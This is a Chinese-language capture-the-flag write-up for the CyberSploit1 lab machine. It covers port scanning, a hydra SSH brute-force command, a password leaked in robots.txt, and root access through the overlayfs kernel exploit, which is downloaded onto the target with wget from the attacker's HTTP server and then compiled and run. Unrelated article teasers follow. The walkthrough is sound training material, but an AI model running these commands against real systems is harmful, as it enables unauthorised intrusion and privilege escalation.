靶场通关记录

news2024/9/29 21:22:59

目录

一、信息收集-端口扫描

     目标开放端口收集

目标端口对应服务探测

信息收集-端口测试

二、 22-SSH弱口令爆破(挂着干别的)

80-HTTP端口的信息收集

三、信息收集-目录访问

漏洞利用-getwebshell


总结


getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录

提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权

准备工作


  • 启动VPN
    获取攻击机IP > 192.168.45.220

  • 启动靶机
    获取目标机器IP > 192.168.176.92

    信息收集-端口扫描


     目标开放端口收集

  • Nmap开放端口扫描2次
  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]
    
    └─# ┌──(root㉿Kali)-[/home/bachang/Blogger]
    
    └─# sudo nmap --min-rate 10000 -p- 192.168.176.92
    
    Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST
    
    Nmap scan report for 192.168.176.92
    
    Host is up (0.30s latency).
    
    Not shown: 65533 closed tcp ports (reset)
    
    PORT STATE SERVICE
    
    22/tcp open ssh
    
    80/tcp open http
    
    
    
    Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

通过两次收集到的端口:→22,80

目标端口对应服务探测

  1. # tcp探测

  2. sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92

信息收集-端口测试

两个端口的话,通常突破口在80端口

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(待定)

通过Nmap探测获得SSH的版本信息,可以尝试利用

  1. # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10

  2. msfconsole

  3. # 搜索对应脚本

  4. msf6 > searchsploit OpenSSH 5.9p1

貌似存在用户枚举,等没思路的时候可以来试试

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破

  1. ssh root@192.168.176.92 -p 22

  2. # 密码尝试

  3. password > root

 22-SSH弱口令爆破(挂着干别的)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22

80-HTTP端口的信息收集

访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始

信息收集-源码查看
  1. # 包括文章中是否写明一些敏感信息

  2. curl http://192.168.176.92:80

收集到一个用户名信息 itsskv

信息收集-目录扫描
信息收集-目录扫描初步
  1. dirsearch -u http://192.168.176.92:80 -x 302,403

因为扫出了目录,深层次的扫描待选

  1. 信息收集-目录扫描(后缀)

  2. 信息收集-目录扫描(深度/大字典)

  3. 信息收集-目录扫描(深度/大字典后缀)

信息收集-目录访问

/robots.txt端点访问
存在一串代码,推测是加密,带等号尝试用bashe64解密

1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

base64解密

利用kali解密得到了内容,确认是base64加密

  1. ┌──(root㉿Kali)-[/home/bachang/Blogger]

  2. └─# echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

  3. " | base64 -d

  4. cybersploit{youtube.com/c/cybersploit}

另外两个端点没东西

漏洞利用-getwebshell

信息泄露getwebshell

已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit}
头脑风暴一下,密码会不会和cybersploit{youtube.com/c/cybersploit}有关
之前hyrda可以爆破说明22端口是允许账号密码登录的

22-SSH账号密码登录(成功)

获取账号密码之后利用SSH进行登录

  1. ssh itsskv<span>@192.168.176.92</span> -p22

  2. password &gt; cybersploit (失败)

  3. password &gt; cybersploit{youtube.com/c/cybersploit}(成功)

密码真长,我真的会谢

内网遨游-getshell


FLAG1获取

  1. # 有2个,理论上排除掉第一个,找home下

  2. itsskv<span>@cybersploit-CTF</span>:~$ find / -name local.txt 2&gt;/dev/null

  3. /usr/share/checkbox/jobs/local.txt

  4. /home/itsskv/local.txt

  5. itsskv<span>@cybersploit-CTF</span>:~$ cat /home/itsskv/local.txt

  6. *********************

信息收集-内网基础信息收集

在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测操作系统的发行版本
  1. # 确定发行版本 较老

  2. itsskv<span>@cybersploit-CTF</span>:~$ lsb_release -a

  3. No LSB modules are available.

  4. Distributor ID: Ubuntu

  5. Description: Ubuntu 12.04.5 LTS

  6. Release: 12.04

  7. Codename: precise

查看内核版本信息
  1. # 确定内核版本

  2. itsskv<span>@cybersploit-CTF</span>:~$ uname -a

  3. Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

确认home目录下用户
  1. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home

  2. total 16

  3. # 有两个用户

  4. drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit

  5. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv

确认home目录下是否有隐藏文件
  1. # 例如.ssh找密码 ./*_history找历史记录等

  2. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home/itsskv

  3. # 查看了一下没啥

  4. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 .

  5. drwxr-xr-x 4 root root 4096 Jun 25 2020 ..

  6. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history

  7. -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout

  8. -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc

  9. drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache

  10. drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config

权限提升

Linux提权-内核overlayfs提权尝试

因为发行版本较老,若存在以下情况进行overlayfsLinux Kernel Version提权

系统版本
Linux Kernel Version大于3.13.0小于3.19
UbuntuLinux 15.04
UbuntuLinux 14.10
UbuntuLinux 14.10
UbuntuLinux 12.04
漏洞利用-内核overlayfs提权
  1. msfconsole

  2. msf &gt; searchsploit overlayfs

结合 3.13.0-32的版本信息选择2与3

  1. # 如果想查看msf对应的内容

  2. cat /usr/share/exploitdb/exploits/linux/local/37292.c

将文件保存在当前目录下,方便开启http服务

  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  2. └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c

  3. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  4. └─# ls

  5. hydra.restore shell.c

攻击机开启服务

1.sudo python3 -m http.server 80

目标机器

  1. # 首先到具有权限的目录下 如/tmp

  2. itsskv<span>@cybersploit-CTF</span>:~$ cd /tmp

  3. # 下载

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ wget http://192.168.45.220/shell.c

  1. # 给权限

  2. itsskv<span>@cybersploit-CTF</span>:/tmp$ chmod +x shell.c

  3. # 如果是c的需要进行编译

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ gcc shell.c -o shell.c

  5. # 运行

  6. itsskv<span>@cybersploit-CTF</span>:/tmp$ ./shell.c

  7. spawning threads

  8. mount #1

  9. mount #2

  10. child threads done

  11. /etc/ld.so.preload created

  12. creating shared library

  13. # whoami

  14. root

提权成功

FLAG2获取

  1. # cat /root/proof.txt

  2. *********************

完结撒花~~~

原文地址: https://bbs.zkaq.cn/t/30873.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1073117.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

mybatisplus接口解析

一、前言 java开发应用程序与数据库交互使用比较多的就是mybatisplus接口。通过mybatisplus接口&#xff0c;我们可以通过程序更好得到对数据库表进行增删查改。 二、mybatisplus Mapper接口源码 /*** Mapper 继承该接口后&#xff0c;无需编写 mapper.xml 文件&#xff0c;即…

1576. 替换所有的问号

1576. 替换所有的问号 C代码&#xff1a;自己写的 char * modifyString(char * s){int n strlen(s);for (int i 0; i < n; i){if (s[i] ?) {if (i ! 0 && i ! n-1) {for (int j 0; j < 26; j) {if (a j ! s[i-1] && a j ! s[i1]) {s[i] a j;br…

SeleniumIDE 自动化用例录制、测试用例结构分析

1、SeleniumIDE用例录制 SeleniumIDE用例录制使用场景 刚开始入门UI自动化测试团队代码基础较差技术成长之后学习价值不高 SeleniumIDE的下载以及安装 官网&#xff1a;https://www.selenium.dev/Chrome插件&#xff1a;https://chrome.google.com/webstore/detail/seleniu…

对音频切分成小音频(机器学习用)

我是把so-vits中小工具&#xff0c;分析源码然后提取出来了。以后可以写在自己的程序里。 -------流程&#xff08;这是我做的流程&#xff0c;你可以不用看&#xff09; 从开源代码中快速获取自己需要的东西 如果有界面f12看他里面的接口&#xff0c;然后在源码中全局搜索&…

英国/法国/意大利/德国/西班牙,电动交通设备合规政策更新!

英国/法国/意大利/德国/西班牙&#xff0c;电动交通设备合规政策更新&#xff01; 产品安全 合规政策更新&#xff01;或加昵称咨询 NOTICE 尊敬的卖家&#xff1a; 您好&#xff01; 我们此次联系您是因为您正在销售需要审批流程的商品。为此&#xff0c;亚马逊正在实施审…

九大装修收纳空间的设计,收藏备用!福州中宅装饰,福州装修

如果房子面积不大&#xff0c;收纳设计就显得非常重要。其实装修房子中很多地方都可以做收纳&#xff0c;九大空间每一处都可以放下你的东西&#xff0c;让你摆脱收纳烦恼。 收纳空间少的话&#xff0c;装修完后住久了怕会乱成一窝&#xff0c;因此装修的时候&#xff0c;收纳…

google hack常用语法介绍

Google hacker (Google黑客)是利用GOOGLE提供的搜索功能查找黑客们想找到的信息.一般是查找网站后台,网管的个人信息,也可以用来查找某人在网络上的活动. Google hacker 一般是做为黑客在入侵时的一个手段.在入侵过程中有时需要查找后台的登陆口就需要用到GOOGLE HACKER.有…

在asp.net中,实现类似安卓界面toast的方法(附更多弹窗样式)

最近在以前的asp.net网页中&#xff0c;每次点击确定都弹窗&#xff0c;然后还要弹窗点击确认&#xff0c;太麻烦了&#xff0c;这次想升级一下&#xff0c;实现类似安卓toast的弹窗提示方式。于是百度了一下&#xff0c;目前看到有两种&#xff0c;sweetalert和toastr。 这里…

Python接口自动化测试实战详解,你想要的全都有

前言 接口自动化测试是当前软件开发中最重要的环节之一&#xff0c;可以提高代码质量、加速开发周期、减少手工测试成本等优点。Python语言在接口自动化测试方面应用广泛&#xff0c;因为它具有简单易学、开发效率高、库丰富等特点。 一、接口自动化测试概述 接口自动化测试…

六个交易日市值蒸发20亿港元,第四范式难逃AI大模型“魔咒”

AI独角兽第四范式终于敲钟了。 北京第四范式智能技术股份有限公司(06682.HK&#xff0c;下称“第四范式”)于9月28日正式挂牌港交所&#xff0c;发行价为55.60港元/股&#xff0c;IPO首日报收58.50港元/股。 上市后6个交易日&#xff0c;截至10月6日港股收盘&#xff0c;第四…

【无监控,不运维!这份监控建设总结太赞了!】

运维行业有句话&#xff1a;“无监控、不运维”&#xff0c;是的&#xff0c;一点也不夸张&#xff0c;监控俗称“第三只眼”。没了监控&#xff0c;什么基础运维&#xff0c;业务运维都是“瞎子”。所以说监控是运维这个职业的根本。 尤其是在现在DevOps这么火的时候&#xf…

【网络安全】网络安全的最后一道防线——“密码”

网络安全的最后一道防线——“密码” 前言超星学习通泄露1.7亿条信息事件武汉市地震监测中心遭境外网络攻击事件 一、密码起源1、 古代密码2、近代密码3、现代密码4、量子密码 二、商密专栏推荐三、如何利用密码保护账号安全&#xff1f;1、账号安全的三大危险&#xff1f;&…

LLaMA Adapter和LLaMA Adapter V2

LLaMA Adapter论文地址&#xff1a; https://arxiv.org/pdf/2303.16199.pdf LLaMA Adapter V2论文地址&#xff1a; https://arxiv.org/pdf/2304.15010.pdf LLaMA Adapter效果展示地址&#xff1a; LLaMA Adapter 双语多模态通用模型 为你写诗 - 知乎 LLaMA Adapter GitH…

PSN 两步验证解除2023.10.9经验贴

背景 本人10月1号收到Sony邮件&#xff0c;说是不规律登录&#xff0c;需修改密码后登录&#xff0c;然后我10月8日登录PS4的时候&#xff0c;提示两步验证。当时就想坏了&#xff0c;然后找B站相关经验贴&#xff0c;10月9号电话香港客服&#xff0c;解除了两步验证&#xff0…

IOT 围炉札记

文章目录 一、蓝牙二、PAN1080三、IOT OS四、通讯 一、蓝牙 树莓派上的蓝牙协议 BlueZ 官网 BlueZ 官方 Linux Bluetooth 栈 oschina 二、PAN1080 pan1080 文档 三、IOT OS Zephyr 官网 Zephyr oschina Zephyr github 第1章 Zephyr简介 第2章 Zephyr 编译环境搭建&#…

云管理平台基本功能有哪些?适配国产化平台吗?

随着云计算的大力发展&#xff0c;越来越多的企业需要云管理平台了。但很多其他对于云管理平台不是很了解&#xff0c;有小伙伴问&#xff0c;云管理平台基本功能有哪些&#xff1f;适配国产化平台吗&#xff1f;这里我们小编就给大家解答一下。 云管理平台基本功能有哪些&am…

【Java】中小学智慧校园管理系统源码 SaaS模式+电子班牌系统

智慧校园电子班牌系统&#xff0c;主要针对中小学校园研发&#xff0c;为校园管理提供智慧管理方案&#xff0c;提供校园智慧管理平台&#xff0c;在大数据平台下&#xff0c;对应用系统进行统一、集中管理&#xff0c;囊括校园管理全方面&#xff0c;实现对校园、班级、教师、…

商城系统选型:Java商城系统还是PHP商城系统好?

电子商务的不断发展&#xff0c;商城系统成为了企业建设在线销售平台的重要组成部分。 可是在选择合适的商城系统时&#xff0c;许多企业面临着一个重要的决策&#xff1a;是选择Java商城系统还是PHP商城系统呢&#xff1f;下面就对这两种常见的商城系统进行比较&#xff0c;并…

jump server是什么

Jump Server&#xff08;跳板服务器&#xff09;是一种安全的中间服务器&#xff0c;用于管理和控制对其他服务器的访问。它提供了一种安全的方式&#xff0c;允许管理员通过跳板服务器来管理和连接其他服务器&#xff0c;而无需直接从外部网络访问内部服务器。 跳板服务器的主…

seata分布式事务理论概述

分布式事务产生的原因&#xff1a; 数据库分库分表 应用的SOA化。就是业务的服务化(面向服务架构) 分布式事务的解决方案&#xff1a; 1、两阶段提交协议2PC 这里的两阶段提交和redolog binlog的两阶段提交不是一个东西&#xff0c;redo log和bin log的两阶段提交保证的是…